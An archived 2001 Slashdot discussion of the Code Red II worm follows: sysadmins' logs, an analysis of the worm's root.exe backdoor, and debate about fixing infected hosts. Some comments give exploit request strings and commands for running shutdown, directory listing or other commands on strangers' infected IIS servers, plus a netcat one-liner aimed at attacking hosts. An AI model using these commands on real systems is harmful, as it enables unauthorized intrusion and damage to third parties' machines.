Follow Slashdot stories on Twitter

 



Forgot your password?
typodupeerror
×
Bug

Code Red Back For More 866

Brian Stretch writes: "The Code Red II worm was unleashed early this morning and appears to be very different than the original and far more dangerous. CR2 infected servers only attack servers within their Class A address block and their Class B address block in particular: since 9:11am EST I've logged 148 CR2 attack attempts, 89 of which are from within my Class B subnet, suggesting that only servers within Class A networks that were deliberately seeded are being attacked. The 24.x.x.x range is one of the hardest hit, and as before, it's folks with cable modems and DSL connections that are providing the most victims." Several @home customers have written about slowed service today, but they're definitely not alone.
This discussion has been archived. No new comments can be posted.

Code Red Back For More

Comments Filter:
  • I felt I was missing the fun... so I decided to open up a port on my firewall and check for some attack attempts...

    It took only ten minutes before /var/log/apache/access_log came up with:

    213.123.150.110 - - [05/Aug/2001:14:12:16 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 281

    Blimey... 10 minutes! This thing is rife!!!

    And yes that machine is in the same class B network as myself. His ping time latency is over 500ms though... (that was at the time of the scan. Normal latency is around 20-50ms).
  • I've gone and hit the addresses showing up in my logs and I haven't seen the tell-tale 'Hacked by Chinese' message. Seems like the new Code Red also leaves the default site at the IP address alone, making it less obvious that a server is infected. Joy.
  • I'm still doubting if I will run something like this on my machines:

    tail -f /var/log/httpd/access_log|gawk '/default.ida/ {system("echo GET /scripts/root.exe?/c+ren+root.exe+root.exe-worm HTTP/1.0|nc "$1" 80")}'

    In theory (I haven't tested it yet) this should rename the root.exe to something else, at least disabling that particular exploit on the machine.

    Messing with other people's machines is a Bad Thing(tm) as far as I'm concerned. On the other hand, if people can't be bothered with keeping their software up to date and are causing inconvenience for other people...

    This root.exe might be a stepup for causing even more problems at a later time!

    Argh, that poses a bit of a moral dilemma for me...
    • Well, no that won't fix it completely - turns out there are a few virtual exploits they put in. From teh recent analysis:

      Basically the above code creates a virtual web path (/c and /d) which maps /c to c:\ and /d to d:\. The writer of this worm has put in this functionality to allow for a backdoor to be placed on the system so even if you remove the root.exe (cmd.exe prompt) from your /scripts folder an attacker can still use the /c and /d virtual roots to compromise your system. The attacks would basically look like:

      http://IpAddress/c/inetpub/scripts/root.exe?/c+dir (if root.exe was still there) or:
      http://IpAddress/c/winnt/system32/cmd.exe?/c+dir Where dir could be any command an attacker would want to execute.

      As long as the trojan explorer.exe is running then an attacker will be able to remotely access your server.

      Man whoever did this put some thought into it.

  • by CodeRed ( 5676 ) on Sunday August 05, 2001 @01:00AM (#2110880) Journal
    Errrr.... More things named in my honor... This can't be good!

    If worms start popping up with Linux4Green (my ICQ nick) then I know I'm bad luck. :-P
    • I wish I could have a virus/worm named after me.
    • by Anonymous Coward
      At least your name isn't Michael Bolton!

      Your name is Michael Bolton? Wow, like the singer guy?
      Yes, and it's just a coincidence.
      So do you like his music?
    • FWIW, it's actually named by the guys who disassembled it after the yummy Mountain Dew beverage. From the bugtraq post:

      We've designated this the .ida "Code Red" worm, because part of the worm is
      designed to deface webpages with the text "Hacked by Chinese" and also
      because code red mountain dew was the only thing that kept us awake all last
      night to be able to disassemble this exploit.

  • A few more details (Score:5, Informative)

    by ryanr ( 30917 ) <ryan@thievco.com> on Sunday August 05, 2001 @01:00AM (#2110882) Homepage Journal
    It doesn't affect its own netspace exclusively. Initial analysis indicates that it will do so 6 out of 7 times. The 1 out of 7 will go outside its network range.

    We'll have full details posted to the Incidents [securityfocus.com] list shortly.
    • Took longer than expected (plus I slept a bit in there.. long night :) )

      http://www.securityfocus.com/archive/75/201878 [securityfocus.com]
      http://www.securityfocus.com/archive/75/201877 [securityfocus.com]
    • by Soko ( 17987 ) on Sunday August 05, 2001 @04:09AM (#2115402) Homepage
      From this thread [infopop.net] on Ars Technica [arstechnica.com]:
      Just discovered something interesting...

      telnet 80

      type GET /scripts/root.exe HTTP/1.0

      and you have a command prompt..

      Like this:
      [root@server httpd]# telnet 24.xxx.xxx.xxx 80
      Trying 24.xxx.xxx.xxx...
      Connected to 24.xxx.xxx.xxx.
      Escape character is '^]'.
      GET /scripts/root.exe HTTP/1.0

      HTTP/1.1 200 OK
      Server: Microsoft-IIS/5.0
      Date: Sun, 05 Aug 2001 07:45:08 GMT
      Content-Type: application/octet-stream
      Microsoft Windows 2000 [Version 5.00.2195]
      (C) Copyright 1985-1999 Microsoft Corp.

      c:\inetpub\scripts>

      [This message was edited by The_Hitman on August 05, 2001 at 03:56.]



      • I can't believe people trust their businesses to this crap. That's just too funny.
      • I found that you must do "GET /scripts/root.exe" without the HTTP/1.0 for it to work.

        Oh yeah, since you can't enter command to the prompt you need to pass the commands to execute as arguments to root.exe (which is really cmd.exe). You can do this by typing "GET /scripts/root.exe?/C%20dir" or something like that. Or you could enter http://somehost/scripts/root.exe?/C%20dir into your favourite browser.

        I've found that typing absolute paths doesn't work for some reason, but http://somehost/scripts/root.exe?/C%20dir%20"..\.. \Documents%20and%20Settings\All%20Users\Desktop\" (remove the spaces) should bring you to the desktop.

        I wanted to leave a message to the admin on the desktop but I have no idea how to do that since "echo" is part of cmd.exe and piping probably won't work too. Perhaps omeone with WinNT skills could offer some ideas?

  • I'm on a /128 cox at home subnet. It's normally very quiet on my subnet, but since this morning it's my firewall has been bouncing packets like crazy.

    I'm guess I'm going to have to put a packet sniffer on the other side of the wall and see what the hell is going on with this code red II.
  • by fanatic ( 86657 ) on Sunday August 05, 2001 @11:52AM (#2111855)
    ...Pick any one.
  • CodeRedNeck (Score:3, Interesting)

    by RoyalTS ( 162213 ) on Sunday August 05, 2001 @10:11AM (#2112215) Homepage
    Check out this heise.de article [heise.de] (in German, sorry)!!! Somebody apparently programmed a little Linux tool that may be able to slow the spread of the worm down a little. The idea was first introduced in the incidents.org forum [incidents.org]. May be worth a look.
  • Someone should tell all those idiots out there who pirate Windows 2000 that they should pirate "Windows 2000 Workstation" and not "Windows 2000 Server" because they're all going to get themselves own3d that way.
  • Of course... (Score:3, Insightful)

    by Jason W ( 65940 ) on Sunday August 05, 2001 @02:02AM (#2112471)
    If you get tired of seeing the requests, you could always shut the server down [securityfocus.com] (the requesting server of course, not yours :).

    Might not remove the worm, but at least gets the "admin" (ha) to pay some attention. Maybe make a request for YOU_HAVE_THE_CODE_RED_WORM_YOU_MORON.HTML right before you do it in case they check the logs :)

  • by Brian Stretch ( 5304 ) on Sunday August 05, 2001 @02:05AM (#2112517)
    It just occurred to me to look up the definition [wrq.com] of Class A/B/C addresses, and yup, I used the terms wrong in my story submission (argh!). What I meant to say was that when the worm generates addresses to scan, it appeared to always keep the first octet and a little over half the time (137 of 224 scans in my case) it keeps the second octet as well. That's no longer precisely true: I've since logged one scan from 152.72.x.x (grep XXXX access_log | grep -v 24.). And the high number of scans from within the first two octets may have more to do with that being a block of cable modem addresses rich in vulnerable IIS machines than anything else.

    And now we know these poor bastards have been rootkitted. There has to be a way to use this to warn them?
  • This is a virus that installs a root kit. The question is, why? Clearly this is in preparation for a next phase. Sysadmins need to be thinking ahead on this.
  • It would be quite easy to shut down those PCs, if there were a "shutdown" command on NT/2k. There isn't; there is one in the Resource Kit but not in the default installation.

    Having said that, you could kill off a Windows PC by issueing

    GET /scripts/root.exe?/c+SHUTDOWN

    Other commands are possible as well: GET /scripts/root.exe?/c+dir+/s+\ gives you the recursive directory tree. Formatting, starting Fdisk and the like are possible, too.

    If someone could post a shutdown.exe somewhere, I'll be glad to provide a simple script that downloads the executable and starts it, thus stopping the IIS machine. Or maybe this is our chance to create Tuxissa :)

  • I'm gonna check the "well-known numbers" RFC, but
    I did a little scan of one of the infectoids:
    Ports open at:
    21
    25 (open mail relay too!)
    80
    135
    139
    443
    445
    1025
    1027
    2057
    2162
    2174
    2200
    2210
    2214
    2219
    2227
    2228
    2257
    2282

    I recogize some of those ports, but surely
    windows doesn't need all those ports open?

  • by MyMomIsALinuxHacker ( 469701 ) on Sunday August 05, 2001 @05:44AM (#2115962)
    Taken from http://www.securitynewsportal.com/article.php?sid= 1354&mode=thread&order=0 [securitynewsportal.com]

    Code Red--the soda--has been spreading almost as fast as its namesake computer worm, which has infected hundreds of thousands of computers to date. The caffeine-laden, cherry-flavored version of its pale-yellow cousin, Mountain Dew, was released in May, months before the Code Red worm threatened to clog Internet traffic. And as computer security experts work to contain the damage from the Code Red worm, the soda's maker, Pepsi, is coincidentally featuring a "Crack the Code" contest on the Mountain Dew Web site.

    Code Red has been an especially big hit with computer programmers, who often guzzle the high-octane drink to fuel late-night code-writing sessions. Among the drink's fans were the staff of eEye Digital Security, who say they identified the Code Red worm and named it after their favorite soda..

    The rest of the story can be found on http://www.securitynewsportal.com/article.php?sid= 1354&mode=thread&order=0 [securitynewsportal.com] .

    Its funny. Laugh. Please?
  • The end is near... (Score:3, Insightful)

    by TrevorB ( 57780 ) on Sunday August 05, 2001 @12:07PM (#2118785) Homepage
    So let me get this straight... Every machine on the planet practically has a list of infected IP addresses broadcasted to them, with a new one arriving every minute or so (up to 663 XXX's here in the past two hours).

    So that means any loser with this list of infected IPs and some knowledge of perl literally has a small army of computers at their command?

    I think we might be seeing some rather impressive DDoS attacks by this evening.

    Hmm.. 3 more XXX's in the time it took me to write this... frequency's increasing...
  • by WereTiger ( 148010 ) <slashdot.weretiger@ca> on Sunday August 05, 2001 @01:59AM (#2119862) Homepage Journal
    Apparently @home is monitoring it's customers for Code Red.
    I'd JUST reinstalled Win2k Pro on a new system, I'd added IIS for my own purposes and before I had a chance to run the service pack and patch, I got the Code Red worm (ok, so I was lazy and tired and was going to leave it for the morning)

    @home unbound my cablemodem until I'd cleared the worm (disable IIS, reboot).

    normally, I'd be a little annoyed at @home for monitoring my connection and cutting my connection rather than just block all traffic to that IP at router level. but hey, it saved me from contributing to a problem.
    • by cybrthng ( 22291 ) on Sunday August 05, 2001 @02:39AM (#2121468) Homepage Journal
      You sure you just didn't dos yourself of the net? :)

      Personally i don't see @Home taking you off and noticing you fixed it and putting you back online.

      Check your outtage listings for your area.


      • In my area, @home can't tell what's out. It takes many hours for an outage to make it onto "the board." If you call before this time, they will make you reboot the computer, reset the modem, etc etc. and then they will schedule a tech to come out. Because, again, let me repeat myself: they have no ability to monitor the network in real-time. I am comvinced that "the board" only shows outage data that they collect from outraged customers.

        (side note: the idiot techs always make you reboot... even though the modem's ability to sync to the network has NOTHING TO DO with the kind of computer it is attached to, or even indeed if the computer is ON or OFF. Sigh.)

        @home is a freaking circus. A monkey house.

        I actually prefer it that way, they are apparently too dense to notice all the servers I run in violation of the TOS.
  • by 2675636B20796F75 ( 453183 ) on Sunday August 05, 2001 @06:25AM (#2121809)
    Ok, here's the latest on this new variant.

    1. It makes a copy of CMD.EXE called ROOT.EXE in the;

    \inetpub\scripts

    and

    \program files\common files\system\msadc

    directories. Does this on both drive C: and D: (doesn't fail if D: doesn't exist).

    2. It then runs its attack program code to infect itself upon numerous other boxes. This is done randomly, although there is a bias to attack boxes that are part of the same class A as infected attacker (so it hits your own boxes sooner rather than later). Attack code runs for 24 hours, 48 hours on Chinese language systems.

    3. After attack code runs (and it seems to be based on clock ticks, not date), it then writes out a Trojan.

    File Explorer.exe (8192bytes or 7K as displayed by Windows) is dropped (from the code in the original attacking URL) to the root of drive C: and D: (again, doesn't matter if D: doesn't exist).

    4. The system is then rebooted (probably a forced reboot).

    5. When the system restarts, it loads the trojan Explorer.exe from the root directory on the boot drive. This code then does several things;

    a) Launches the real Explorer.exe, so the system looks normal.

    b) Sets SFCDisable in hklm\software\microsoft\windows nt\currentversion\winlogon to some undocumented value. Presumably this disables Windows File Protection (so critical files could be overwritten)

    c) Creates two virtual directories (via the registry) in hklm\system\currentcontrolset\services\w3svc\param eters\virtual roots. Called "C" and "D", they are mapped to the root directories of the two drives and permissions are established in the virtual directory to allow script, read, and write access as well as setting execute permissions to scripts and executables.

    d) goes into an endless sleep loop.

    The end result of all of this action is to leave your box wide open to remote connection and total compromise.

    Unlike "Code Red", this worm doesn't attack any single target at any point, although its attack strength seems to be much higher (it launches 300 threads right off, although some may only launch 100), so its propagation seems much higher.

    The attack only works properly on Windows 2000 systems (preliminary analysis). ICSA Labs tested against an NT 4.0/IIS 4.0/SP3 box and received a standard error message. Reports from subscribers suggest that XP IIS 5.1 RC1 is invulnerable also. Its expected that it works on PWS and OWS equally to IIS (all on W2K).

    Its obviously a short-lived attack, at least the process of collecting victims. What would be done with them once collected is another story. No attempt is made by the worm to send anything "home", although detecting compromised boxes is far too easy (very unfortunately) for anyone outside your network.

    Cleaning a compromised box should really be done by reformatting. Although logging is left on for the new virtual directories created (meaning you'd see access in your IIS logs), there's really no way to be sure that files haven't been implanted to leave other backdoors (not as part of this worm, but as part of the use of the opening it creates).

    Credits:

    The bulk of the analysis was done by Nick Fitzgerald of Virus-L (and friends) and Roger Thompson of TruSecure. Additional help came from Bruce Hughes of the ICSA Labs.

    Cheers,
    Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor

  • by cybrthng ( 22291 ) on Sunday August 05, 2001 @01:13AM (#2126423) Homepage Journal
    If there isn't one thing that can break the straw nothing will.

    I'm warned that smoking and drinking are bad for my health

    Medicines and drugs aren't legal unless they're fully tested and approved

    My car doesn't lock up and freeze

    My microwave doesn't blue screen and cook my brain inside out.

    SO WHY THE HELL IS THE CORE FUNCTIONALITY OF MY PC allowed to distribute my personal information, crash during critical functionality, be succeptable to cracks and attacks that are easily preventable.

    WHY do i have to pay extra for the functionality of NOT being succeptable to virii and net attacks?

    WHY doesn't microsoft NOTIFY me of the risks of using its OS?

    I hope no ones bank is trusting microsoft, i hope anyone doing online transactions don't trust microsoft. I hope no one keeps personal, private, confidential and financial data on there pc's.

    I hope no one running Windows is on the internet for that matter.

    • > My microwave doesn't blue screen and cook my brain inside out.
      >
      > SO WHY THE HELL IS THE CORE FUNCTIONALITY OF MY PC allowed to distribute my personal information, crash during critical functionality, be succeptable to cracks and attacks that are easily preventable.

      For his track record of trading security for market share, I'm just as happy as any Slashdotter to see Bill Gates' nuts roasted over a fire until they pop.

      But the fact is, your PC - whether it runs CP/M, BeOS, FreeBSD, Linux, or Windows XP - is fundamentally different from embedded systems like your microwave and your car.

      Design flaws can exist - in medicines, in consumer products, in closed-source applications, and yes, in open-source applications.

      The reason the "core functionality" of your PC is "allowed" to distribute your private information is because it has to be able to do so if you're going to write emails to your friends.

      The reason it's "allowed" to crash is the same reason automobiles are "allowed" to crash -- sometimes it's a design flaw (Code Red IIS exploit, BIND exploit, Ford Pinto gas tank that exploded on rear impact), and sometimes it's operator error (SirCam worm, drunk driver).

      > I hope no one keeps personal, private, confidential and financial data on there pc's.

      The only truly secure machine is the one that's been unplugged, powered down, encased in concrete, wrapped up in a Faraday cage, and then dropped into the Marianas Trench. Ya gotta do what ya gotta do.

      • by IronChef ( 164482 ) on Sunday August 05, 2001 @04:17AM (#2112766)

        Unlike a car that explodes to a design flaw, software that explodes due to a design flaw seems to be immune to the civil justice system.
    • WHY do i have to pay extra for the functionality of NOT being succeptable to virii and net attacks?

      Actually, you don't. Linux is free :-p
    • This won't break Microsoft's back .... consumers voting with their feet can only achieve that end.

      Recently I was looking around for a new insurance company. Looking on the web I came across a couple of companies who would give me a quote if I provided them with some personal information. I was all set to deal with one site, whom I won't name, but I decided to first do a quick background check on them. Using netcraft [netcraft.com] I was able to tell they were running their site on IIS. That little bit of info told me that they weren't at all serious about keeping my personal information confidential.

      Of course I decided not to pursue any business with them. But I also went a step further. I wrote them a quick email informing them that I would never do business with a company who was choosing to base their internet business on the most hacked application platform on the internet [attrition.org].

      Let companies know that you won't do business with them if they use inferior products. Your quick and simple message to them will speak more loudly than a thousand rants on various message boards.

  • by mcleodnine ( 141832 ) on Sunday August 05, 2001 @01:11AM (#2126740)

    Seeing a lot of "XXXX" and far fewer "NNNN" in the logs. This version appears to stay crunchier in milk than the first. Up to 25-30 per hour, from 10 this afternoon. The 24.x.x.x may be getting slammed, but I can see another that is just as bad.

    Snipped from incidents dot org (emphasis added)
    Both Henk Wevers and corecode submitted packet traces of the complete request as shown below. Comparing this trace with the original Code Red (see the Code Red Infection Illustrated section of the July 23 Handler's Diary at: http://www.incidents.org/diary/july2001.php) it is immediately obvious that we are dealing with a new worm. Note that line 820 shows that the worm is doing something with
    CMD.EXE; also the dump contains the string 'CodeRedII' on line 230. Note the references to root.exe on lines 840 and 880.

    Article also mentions that it appears the compromised servers are backdoored and rooted. Ouch.

    The editorial accusations of crying wolf might look a little pale this evening...

    • by Eeeeegon ( 71595 ) on Sunday August 05, 2001 @02:50AM (#2118690) Journal
      This worm is combining TWO worms; both the Code Red worm we know and love, and the less-recent SANDMIND worm (sp?), famous for running of DOS commands and posting an anti-US webpage at 'default.asp', 'default.html', 'index.asp', and 'index.html' on directories relative to the website root. Apparently this worm is using 'cmd.exe' to get root access; what it does beyond that, I have no idea... I haven't been hit by it. I guess the logic is .... if the box isnt patched against Code Red, chances are it isn't patched against SANDMIND, too.

      Also, 90% of the 'NNNN's in my server logs came from my Class A subnet (and much more frequently than the 'XXXXX' requests).

      Logs available upon request, etc.
  • by cyberdonny ( 46462 ) on Sunday August 05, 2001 @03:03AM (#2126953)
    From the article [unixwiz.net]:

    In particular, the fact that it has "CodeRedII" inside means that it couldn't possibly be the original worm -- the name wasn't attached until after it was released.

    If this beast is truely wicked, it will scan assorted websites such as Slashdot, Wired, etc, and as soon as it will see talk about itself [slashdot.org] it will enter its active phase...

  • by Simon Brooke ( 45012 ) <stillyet@googlemail.com> on Sunday August 05, 2001 @12:10PM (#2127197) Homepage Journal
    I wrote the following shell script to mail webmasters on infected hosts:
    #!/bin/bash

    # OK: the rationale behind this is that it will lookup the name of each host
    # which probes us with the Code Red style probe, and then see whether that
    # name resolves back to the number. If it does there's some hope that it's a
    # real host, so we'll try to mail webmaster@

    log=$HOME/codered.log

    for ip in `grep default.ida /var/log/httpd/access_log |\
    awk '{print $1}'`
    do
    grep "$ip" $log > /dev/null

    if [ $? -ne 0 ]
    then # it's not there
    echo $ip >> $log # remember so we don't mail them again

    host=`dig -x $ip -Aq +nocmd +nostats +noheader +noauthor \
    +noaddit | tail -3 | awk '{print $5}' | sed 's/\.$//'`

    echo -n "Seen $ip [$host]"

    echo $host | grep '^[a-z0-9.-]*$' > /dev/null

    if [ $? -eq 0 ]
    then
    echo -n "...appears to be valid..."

    valid=`nslookup $host | tail -2 | grep '^Address:' |\
    awk '{print $2}'`
    fi

    if [ "$ip" = "$valid" ]
    then
    mail -s "Your machine appears to be infected by Code Red" \
    webmaster@$host <<EOF

    Dear Webmaster

    We have received a request for 'default.ida' from your server at
    $ip. This is usually an indication that you have been
    infected by the 'Code Red' or 'Code Red II' worm, currently
    attacking Microsoft IIS servers. To secure your server, download
    and install the appropriate patch from Microsoft


    * Windows NT 4.0:
    http://www.microsoft.com/Downloads/Release.asp?Rel easeID=30833

    * Windows 2000:
    http://www.microsoft.com/Downloads/Release.asp?Rel easeID=30800

    Or, better still, switch to a proper operating system
    EOF
    echo " ...mailed"
    else
    echo " ? not valid?"
    fi
    fi
    done

    I've been hit by 61 different unique IP's today, of which 17 had IPs which resolved to addresses which resolved to the same IPs. So how many of my mails were actually accepted for delivery?

    That's right, none.

  • logs (Score:5, Interesting)

    by Kryptolus ( 238444 ) on Sunday August 05, 2001 @12:53AM (#2128143) Homepage
    automatically generated list of attacks against my server [kryptolus.com]

    147 attacks so far

    the page is generated through a perl script that reads my apache logs
  • by stuccoguy ( 441799 ) on Sunday August 05, 2001 @02:09AM (#2128303)
    This guy's computer is infected and attacking me every 10 minutes or so. I went to his web page and found this [66.1.83.146] resume which indicates the guy is a Windows2000 expert and Network Technician!
  • by weave ( 48069 ) on Sunday August 05, 2001 @06:33AM (#2129723) Journal
    With this high a number if scans it is now suicidal to install IIS while connected to the net. Chances are very good that your box will get compromised before you have a chance to apply the patch, even if you do so right away. And since people can easily set up a reverse hack to automatically do other nasty stuff to your box after THEY get probed, the risk is even higher.

    Solution, never ever have your box plugged into the network while installing a Windows server. Only plug it in after all patches, service packs, and hot fixes have been applied first.

    • Solution, never ever have your box plugged into the network while installing a Windows server. Only plug it in after all patches, service packs, and hot fixes have been applied first.

      Interesting dilemma... how exactly are these people going to get the patches to be installed with the system unplugged? Microsoft is going to have to release a patch CD.
  • by nebby ( 11637 ) on Sunday August 05, 2001 @04:04AM (#2135887) Homepage
    Since it seems that it's possible to run, and basically do, anything trivially on any of these infected computers via the root.exe "script" I'm guessing that a lot of shit is going to go down in the next two days that will probably be both good and bad for Microsoft and the public's understanding of network security.

    I'm also guessing that right now a bunch of /.'ers are doing one of two things:

    1) Writing scripts to make things suck more for those who have been compromised (shame on you)
    or
    2) Writing scripts to fix the compromised servers

    I propose that if a script is created to fix these servers (Code Green? :)) that it not be launched until after Monday afternoon around 3 or 4PM, since this is a serious problem for both sysadmin's and Microsoft. If a large part of the damage is avoided by white hat hackers sending a cure for the virus out, it will only happen again. If you don't give them time to sweat, then nothing will be changed and a even more malicious virus (which say, deletes the entire contents of the drives or something) will be unleashed soon enough.

    So, before you go out and launch a cure for the problem, think twice about the long term effects of doing so. Create it, make sure it works, and then the Open Source movement can release a cure for the problem faster than anyone else and "we" (I'm not really part of the OSS movement, or whatever) will look like the good guys. Instead of the media holding Microsoft on high for providing the cure to a problem they caused, if the patch is done and ready and launched by Monday afternoon they will have egg on their faces.

    Thanks.
    • by startled ( 144833 ) on Sunday August 05, 2001 @02:49PM (#2128790)
      Bah, what a waste. Screw that, here are some other things you should do along with your white hat program:

      1. Distribute Elcomsoft's e-book reader to all compromised boxes; search for any Adobe e-books and write out a plaintext copy.
      2. Append the code to DeCSS to all Word documents on the box.
      3. Modify the code to only patch the box when Dmitry is finally released from jail.
      4. Install Linux; reboot.
      5. Install BSD; reboot.
      6. Configure box to DoS MS's IIS patch servers; condemn MS for making patches inaccessible.
      7. Script all boxes to respond to /. stories with one of two comments: "dammit, this is a duplicate! Here is the original at goatse.cx", or "Katz iz 4 t00l!!!1@".
      8. Install SETI; add the box to your team; brag about your high score.

      Note: these are jokes. Please, please, do not do these things. Especially because if you do, the feds will come knocking on my door. :)
  • Why don't they... (Score:4, Insightful)

    by Greyfox ( 87712 ) on Sunday August 05, 2001 @01:13AM (#2138054) Homepage Journal
    Modify the code red code to apply the security patch to the vulnerable IIS servers and reboot the system? While this is potentially destructive to your system (I'm told -- MS security patches and all that) it would pretty well take care of this problem...
    • by rawg ( 23000 )
      This will not work. How is your worm going to spread if you fix the system?
      • Easy. Make it so it isn't a true "worm".

        Make it so it patches against the exploit, then routes all attempted re-exploitation to a small CGI that uses the backdoor to disinfect the attacking system, and install the countermeasure.

        So...assuming you're getting hit with 30 requests an hour from 30 different IPs -- and each of those 30 is getting hit the same way -- the "fix" could propagate itself like wildfire, without being an "active" worm (seeking out hosts to disinfect), but instead being a "passive" worm (waiting for an infected computer to contact it, then disinfecting that computer, and passing on the "passive" disinfector).

        Problem being, it's still modifying the data on someone else's computer, without their knowledge or permission. I believe that makes it illegal -- even if it is working for "good" rather than for "evil".
    • by tswinzig ( 210999 ) on Sunday August 05, 2001 @02:47AM (#2121317) Journal
      Modify the code red code to apply the security patch to the vulnerable IIS servers and reboot the system? While this is potentially destructive to your system (I'm told -- MS security patches and all that) it would pretty well take care of this problem...

      Nah, this will just make the sysadmins even lazier.

      SysAdmin #1: Dude, your NT machines are all infected with Code Red!

      SysAdmin #2: I know! I'm just waiting for for them to be infected with the fix... should be any day now...
  • by RzUpAnmsCwrds ( 262647 ) on Sunday August 05, 2001 @01:15AM (#2138057)
    Man, I'm glad that I'm not using [Microsoft Product]. This new [virus/worm/trojan] exploits a [flaw/bug/backdoor] in [Microsoft Product], and it [does/doesn't] use Outlook and the stupidity of users. Luckily, I'm running [Free alternative to Microsoft product], so I'm not at risk. In fact, [Free alternative to Microsoft product] has protected me from [any integer over 200] [viruses/worms/trojans]. And just look at the [hundreds/thousands/millions/billions] of dollars that I've saved using [Free alternative to Microsoft product]. I hope that this [Free alternative to Microsoft product] takes off, along with [free alternative to Microsoft OS]. Unfortunately, my [company/home] has to pay for the stupidity of Microsoft: this [virus/worm/trojan] sucked [250KB/250MB/250GB/250TB] of bandwidth!

    • > Man, I'm glad that I'm not using [Microsoft Product]. This new [virus/worm/trojan] exploits a [flaw/bug/backdoor] in [Microsoft Product], and it [does/doesn't] use Outlook and the stupidity of users. Luckily, I'm running [Free alternative to Microsoft product], so I'm not at risk. In fact, [Free alternative to Microsoft product] has protected me from [any integer over 200] [viruses/worms/trojans]. And just look at the [hundreds/thousands/millions/billions] of dollars that I've saved using [Free alternative to Microsoft product]. I hope that this [Free alternative to Microsoft product] takes off, along with [free alternative to Microsoft OS]. Unfortunately, my [company/home] has to pay for the stupidity of Microsoft: this [virus/worm/trojan] sucked [250KB/250MB/250GB/250TB] of bandwidth!

      I hereby propose we adopt your post as a convention.

      We can thus encode "war stories" about the latest [worm/virus/trojan] as follows, saving Slashdot a fortune in bandwidth charges.

      For instance, I can now describe my evening as follows:

      "IIS. Code Red II. flaw. IIS. doesn't. FreeBSD. 429. worms. thousands. Apache. Apache. FreeBSD. company. worm. 6.2MB."

    • Ha ha, that was funny! Of course we know worms never infect unix or open source systems [std.com] !

Numeric stability is probably not all that important when you're guessing.

Working...